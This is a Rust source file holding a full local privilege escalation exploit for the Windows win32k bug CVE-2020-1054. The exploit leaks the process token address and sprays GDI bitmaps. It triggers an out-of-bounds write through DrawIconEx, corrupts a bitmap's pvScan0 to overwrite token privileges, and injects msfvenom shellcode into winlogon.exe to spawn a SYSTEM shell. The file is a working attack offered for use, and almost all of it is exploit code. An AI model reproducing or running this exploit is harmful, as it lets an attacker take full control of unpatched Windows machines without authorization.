/* 
CVE-2020-1054 LPE written by @0xeb_bp
Bug found by Netanel Ben-Simon and Yoav Alon from Check Point Research 
and bee13oy of Qihoo 360 Vulcan Team.
*/

use winapi::shared::windef::{ HDC, HBITMAP, HICON };
use winapi::um::wingdi::{   
                        CreateCompatibleDC, 
                        CreateCompatibleBitmap, 
                        SelectObject,
                        SetBitmapBits, 
                        GetBitmapBits
                        };
use winapi::um::winuser::DrawIconEx;
use winapi::um::{processthreadsapi, memoryapi, handleapi};
use winapi::um::winnt::*;
use winapi::um::psapi::{EnumProcesses, EnumProcessModules, GetModuleBaseNameA};
use winapi::shared::ntstatus::{STATUS_SUCCESS};
use winapi::shared::minwindef::{HMODULE, LPVOID};
use winapi::ctypes::c_void;

use ntapi::ntexapi;
use ntapi::ntrtl::RtlGetCurrentPeb;
use ntapi::ntpebteb::PPEB;

use std::mem::{ size_of, MaybeUninit };
use std::ptr::null_mut;


#[allow(overflowing_literals)]
fn main() {
    println!("CVE-2020-1054 LPE written by @0xeb_bp\n");

    let sys_handle_info_ex_size = size_of::<ntexapi::SYSTEM_HANDLE_INFORMATION_EX>();

    let pid = unsafe { processthreadsapi::GetCurrentProcessId() as usize };
    let h_proc = unsafe { processthreadsapi::GetCurrentProcess() };
    let t_handle = Box::into_raw(Box::<usize>::new(0));

    let ret = unsafe { processthreadsapi::OpenProcessToken(h_proc, TOKEN_QUERY, t_handle as PHANDLE) };
    if ret == 0 {
        println!("[-] Error Getting Current PID Token");
        return;
    }

    println!("[+] Pid                                = {:?}", pid);
    unsafe { println!("[+] Token Handle                       = {:x}", *t_handle); }

    let mut len: u32 = 0;
    let len_ptr = &mut len as *mut u32;

    let mut sys_handle_info_ex: Vec<u8> = vec![0; sys_handle_info_ex_size];

    let mut ret = unsafe { ntexapi::NtQuerySystemInformation(0x40, sys_handle_info_ex.as_ptr() as *mut c_void,
        sys_handle_info_ex_size as u32, len_ptr) };

    // keep going until enough space is allocated and we get a STATUS_SUCCESS
    while ret != STATUS_SUCCESS {
        sys_handle_info_ex = vec![0; len as usize];

        ret = unsafe { ntexapi::NtQuerySystemInformation(0x40, sys_handle_info_ex.as_ptr() 
            as *mut c_void, len, len_ptr) };
    }

    let sys_handle_info_ex_ptr = sys_handle_info_ex.as_ptr() as ntexapi::PSYSTEM_HANDLE_INFORMATION_EX;
    let num_handles = unsafe { (*sys_handle_info_ex_ptr).NumberOfHandles as usize };

    /*
    SYSTEM_HANDLE_INFORMATION_EX
    Offset (x86)	Offset (x64)	Definition
    0x00	        0x00	        ULONG_PTR NumberOfHandles;
    0x04	        0x08            ULONG_PTR Reserved;
    0x08	        0x10        	SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles [1];
    */

    let mut pid_eprocess: usize = 0;
    unsafe {
        let p = sys_handle_info_ex.as_ptr().offset(0x10);
        for handle in 0..num_handles {
            let offset = handle * 40;
            let z = p.offset(offset as isize) as ntexapi::PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
            if (*z).UniqueProcessId == pid {
                if (*z).HandleValue == *t_handle {
                    pid_eprocess = (*z).Object as usize;
                    println!("[+] PID Token Address                  = {:x}", pid_eprocess as usize);
                    break;
                }
            }
        }
    }

    let pid_token_privs_address = pid_eprocess+0x40;
    println!("[+] PID Token Privilege Address        = {:x}", pid_token_privs_address);

    // size of base bitmap
    let base_size =   0x51500;

    // Create device context
    let base_dc: HDC = unsafe {
        CreateCompatibleDC(null_mut())
    };

    // Create Bitmap
    let base_handle: HBITMAP = unsafe {
        CreateCompatibleBitmap(base_dc, base_size, 0x100) //
    };

    println!("[+] Base Bitmap Handle                 = {:x}", base_handle as usize); 

    let peb: PPEB = unsafe {
        RtlGetCurrentPeb()    
    };
    
    // Use GDI handle to calculate offset of its entry in table
    // sizeof(GDICELL64) = 0x18
    let base_bm_address: usize = unsafe { 
           *( ((*peb).GdiSharedHandleTable as usize + (base_handle as usize & 0xffff) * 0x18) as *mut usize )
    };

    // 0xfffff900c3556000
    // 0x0000000100000000
    // 0xfffff901c3556000
    let oob_target = (base_bm_address & 0xfffffffffff00000) + 0x0000000100000000;

    // size of sprayed/alloc'd bitmaps
    let alloc_size: i32 = 0x6f000;
    // used to allocate x extra bitmaps after we are > the oob_target
    let mut extra_alloc = 0;

    // address of bitmap surface object that we use OOB write to increase size
    let mut oob_target_address: usize    = 0;
    // address of bitmap surface that has pvscan overwritten
    let mut pvscan_target_address;

    // surfobj2
    // used to overwrite pvscan of surfobj3
    let mut oob_target_handle: MaybeUninit<HBITMAP>    = unsafe { MaybeUninit::uninit().assume_init() };
    // surfobj3
    // address of bitmap surface object that we use the previous increased size
    // bitmap to overwrite this object's pvscan01 with a "where"
    // we can then use this to write a "what"
    let mut pvscan_target_handle: MaybeUninit<HBITMAP> = unsafe { MaybeUninit::uninit().assume_init() };

    println!("[+] Base Bitmap Surface Obj Address    = {:x}", base_bm_address); 

    let alloc_dc: HDC = unsafe {
        CreateCompatibleDC(null_mut())
    };

    println!("[+] Generating Bitmaps...");

    loop {
        let alloc_handle: HBITMAP = unsafe {
            CreateCompatibleBitmap(alloc_dc, alloc_size, 0x8)
        };

        // Use GDI handle to calculate offset of its entry in table
        // sizeof(GDICELL64) = 0x18
        let alloc_bm_address: usize = unsafe { 
            *( ((*peb).GdiSharedHandleTable as usize + (alloc_handle as usize & 0xffff) * 0x18) as *mut usize )
        };

        if alloc_bm_address == 0 {
            println!("[-] Ran out of memory allocating Bitmaps");
            return;
        }
    
        if (alloc_bm_address >= oob_target) && (alloc_bm_address & 0x0000000000070000 == 0x70000) {
            oob_target_address = alloc_bm_address;
            unsafe { *oob_target_handle.as_mut_ptr() = alloc_handle; }
            println!("[+] Surf Obj to OOB overwrite the size = {:x}", oob_target_address);
        }

        // this is true when we've hit the oob_target and assigned an address
        if oob_target_address > 0 {
            // the second time through we are allocating the pvscan_target
            if extra_alloc == 1 {
                pvscan_target_address = alloc_bm_address;
                unsafe { *pvscan_target_handle.as_mut_ptr() = alloc_handle; }
                println!("[+] Surf Obj to overwrite pvScan01     = {:x}", pvscan_target_address);
            }
            // break out
            if extra_alloc > 1 {
                break;
            }
            extra_alloc += 1;
        }
    }

    unsafe { 
        // Select Object into DC
        SelectObject(base_dc, base_handle as *mut c_void); 
        // DrawIcon
        DrawIconEx(
            // device context
            base_dc, 
            // offset
            //0x8c0,   // USE FOR POST KB PATCH
            0x900, // USE FOR PRE  KB PATCH
            // iteration count
            0xb,
            // handle
            0x40000010003 as HICON, 
            // roughly writes per iteration
            0x0,
            // use to get oob
            0xffe00000,
            0x0, 
            null_mut(), 
            // mask
            0x1);
    }

    println!("[+] GetBitMapBits/Reading using oob_target...");
    // 0x6fe10 i calculated via
    //typedef struct {
    //  ...
    //  } BASEOBJECT64; // sizeof = 0x18
    //typedef struct {
    //    ULONG64 dhsurf; // 0x00
    //    ULONG64 hsurf; // 0x08
    //    ULONG64 dhpdev; // 0x10
    //    ULONG64 hdev; // 0x18
    //    SIZEL sizlBitmap; // 0x20
    //    ULONG64 cjBits; // 0x28
    //    ULONG64 pvBits; // 0x30
    //    ULONG64 pvScan0; // 0x38
    //    ULONG32 lDelta; // 0x40
    //    ...
    //  } SURFOBJ64; // sizeof = 0x50
    // first read up to pvScan0
    // pvscan_target - (oob_target + 0x240) + 0x18 (BASEOBJ) + 0x38 (up to pvScan0)

    // USED FOR POST KB PATCH
    let get_data: Vec<u8> = vec![0x00; 0x6fe10];
    // USED FOR PRE  KB PATCH
    //let get_data: Vec<u8> = vec![0x00; 0x6fe18];

    // read data up to to the pvScan0 in the next surf obj struct
    // we want this data so when we write over the next SURFOBJ struct
    // no critical pointers are lost
    unsafe {
        GetBitmapBits(*oob_target_handle.as_mut_ptr(), get_data.len() as i32, 
            get_data.as_ptr() as *mut c_void);
    }

    println!("[+] SetBitmapBits/Overwriting pvScan0...");
    let mut set_data: Vec<u8> = vec![];
    // reuse all data from get and overwrite pvScan0 with arbitrary address
    set_data.extend_from_slice(&get_data[..]);
    // set to PID Token Privs address
    let pid_token_privs_address = pid_token_privs_address.to_be_bytes().to_vec();
    let pid_token_privs_address: Vec<u8> = pid_token_privs_address.into_iter().rev().collect();
    set_data.extend_from_slice(&pid_token_privs_address[..]);
    
    let ret = unsafe { 
        SetBitmapBits(*oob_target_handle.as_mut_ptr(), set_data.len() as u32, 
            set_data.as_ptr() as *mut c_void) 
    };

    println!("[+] Overwrote pvScan01 (SetBitmapBits returned {:x} bytes)", ret);

    println!("[+] Overwriting token priviliges");

    let privs: Vec<u8> = vec![0xff; 0x18];
    let ret = unsafe { 
        SetBitmapBits(*pvscan_target_handle.as_mut_ptr(), privs.len() as u32, 
            privs.as_ptr() as *mut c_void) 
    };

    println!("[+] Overwrote token privileges (SetBitmapBits returned {:x} bytes)", ret);

    println!("[+] Searching for winlogon.exe PID");
    let mut processes: [u32; 4096] = [0; 4096];
    let ret = unsafe { EnumProcesses(processes.as_mut_ptr(), 4096, len_ptr) };       
    if ret == 0 {
        println!("[-] Error EnumProcesses");
        return;
    }

    let num_processes = len/4;

    let target_p = String::from("winlogon.exe");
    let mut winlogon_pid = 0;

    // search for winlogin.exe
    for process in 0..num_processes {
        let tpid = processes[process as usize];
        let hprocess = unsafe { processthreadsapi::OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, tpid) };

        if hprocess as usize != 0 {
            let hmodule = Box::into_raw(Box::<usize>::new(0));

            let ret = unsafe {EnumProcessModules(hprocess, hmodule as *mut HMODULE, 8, len_ptr) };
            if  ret != 0 {
                let mut pname: [i8; 1024] = [0; 1024];

                unsafe { GetModuleBaseNameA(hprocess, *hmodule as HMODULE, pname.as_mut_ptr(), 1024) };

                let found = String::from_utf8(pname.iter().map(|&c| c as u8).collect()).unwrap();
                let found = found.trim_matches(char::from(0));

                unsafe { handleapi::CloseHandle(hprocess) };

                if found == target_p {
                    println!("[+] Found winlogin.exe pid: {}", tpid);    
                    winlogon_pid = tpid;
                    break;
                }
            }   
        }
    }

    if winlogon_pid == 0 {
        println!("[-] Error finding winlogin.exe pid");
        return;
    }

    // inject our shellcode into winlogin.exe
    println!("[+] Injecting into winlogon.exe");
    //OpenProcess
    let hprocess = unsafe { processthreadsapi::OpenProcess(PROCESS_ALL_ACCESS, 0, winlogon_pid) };
    if hprocess as usize == 0 {
        println!("[-] Error OpenProcess winlogin.exe");
        return;
    }

    //VirtualAllocEx
    let hmem = unsafe { memoryapi::VirtualAllocEx(hprocess, null_mut(), 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE) };
    if hmem as usize == 0 {
        println!("[-] Error VirtualAllocEx");
        return;
    }

    // msfvenom shellcode
    // msfvenom -p windows/x64/exec CMD=cmd exitfunc=thread -b "\x00"
    let shellcode = [
        0x48u8,0x31,0xc9,0x48,0x81,0xe9,0xde,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,
        0xff,0xff,0x48,0xbb,0xd9,0x13,0x74,0x30,0x61,0x6e,0x0c,0x7b,0x48,0x31,0x58,
        0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x25,0x5b,0xf7,0xd4,0x91,0x86,
        0xcc,0x7b,0xd9,0x13,0x35,0x61,0x20,0x3e,0x5e,0x2a,0x8f,0x5b,0x45,0xe2,0x04,
        0x26,0x87,0x29,0xb9,0x5b,0xff,0x62,0x79,0x26,0x87,0x29,0xf9,0x5b,0xff,0x42,
        0x31,0x26,0x03,0xcc,0x93,0x59,0x39,0x01,0xa8,0x26,0x3d,0xbb,0x75,0x2f,0x15,
        0x4c,0x63,0x42,0x2c,0x3a,0x18,0xda,0x79,0x71,0x60,0xaf,0xee,0x96,0x8b,0x52,
        0x25,0x78,0xea,0x3c,0x2c,0xf0,0x9b,0x2f,0x3c,0x31,0xb1,0xe5,0x8c,0xf3,0xd9,
        0x13,0x74,0x78,0xe4,0xae,0x78,0x1c,0x91,0x12,0xa4,0x60,0xea,0x26,0x14,0x3f,
        0x52,0x53,0x54,0x79,0x60,0xbe,0xef,0x2d,0x91,0xec,0xbd,0x71,0xea,0x5a,0x84,
        0x33,0xd8,0xc5,0x39,0x01,0xa8,0x26,0x3d,0xbb,0x75,0x52,0xb5,0xf9,0x6c,0x2f,
        0x0d,0xba,0xe1,0xf3,0x01,0xc1,0x2d,0x6d,0x40,0x5f,0xd1,0x56,0x4d,0xe1,0x14,
        0xb6,0x54,0x3f,0x52,0x53,0x50,0x79,0x60,0xbe,0x6a,0x3a,0x52,0x1f,0x3c,0x74,
        0xea,0x2e,0x10,0x32,0xd8,0xc3,0x35,0xbb,0x65,0xe6,0x44,0x7a,0x09,0x52,0x2c,
        0x71,0x39,0x30,0x55,0x21,0x98,0x4b,0x35,0x69,0x20,0x34,0x44,0xf8,0x35,0x33,
        0x35,0x62,0x9e,0x8e,0x54,0x3a,0x80,0x49,0x3c,0xbb,0x73,0x87,0x5b,0x84,0x26,
        0xec,0x29,0x78,0xdb,0x6f,0x0c,0x7b,0xd9,0x13,0x74,0x30,0x61,0x26,0x81,0xf6,
        0xd8,0x12,0x74,0x30,0x20,0xd4,0x3d,0xf0,0xb6,0x94,0x8b,0xe5,0xda,0x8e,0x11,
        0x51,0xd3,0x52,0xce,0x96,0xf4,0xd3,0x91,0x84,0x0c,0x5b,0xf7,0xf4,0x49,0x52,
        0x0a,0x07,0xd3,0x93,0x8f,0xd0,0x14,0x6b,0xb7,0x3c,0xca,0x61,0x1b,0x5a,0x61,
        0x37,0x4d,0xf2,0x03,0xec,0xa1,0x53,0x0c,0x0a,0x0c,0x7b];

    //WriteProcessMemory
    let ret = unsafe { memoryapi::WriteProcessMemory(hprocess, hmem, shellcode.as_ptr() as *const c_void, shellcode.len(), 
                            null_mut()) };
    if ret == 0 {
        println!("[-] Error WriteProcessMemory");
        return;
    }

    println!("[+] Spawning shell...");
    //CreateRemoteThread
    let f = unsafe { Some(*(&hmem as *const _ as *const unsafe extern "system" fn(LPVOID) -> u32)) };
    let ret = unsafe { processthreadsapi::CreateRemoteThread(hprocess, null_mut(), 0, f, null_mut(), 0, null_mut()) };
    if ret as usize == 0 {
        println!("Error CreateRemoteThread");
        return;
    }
}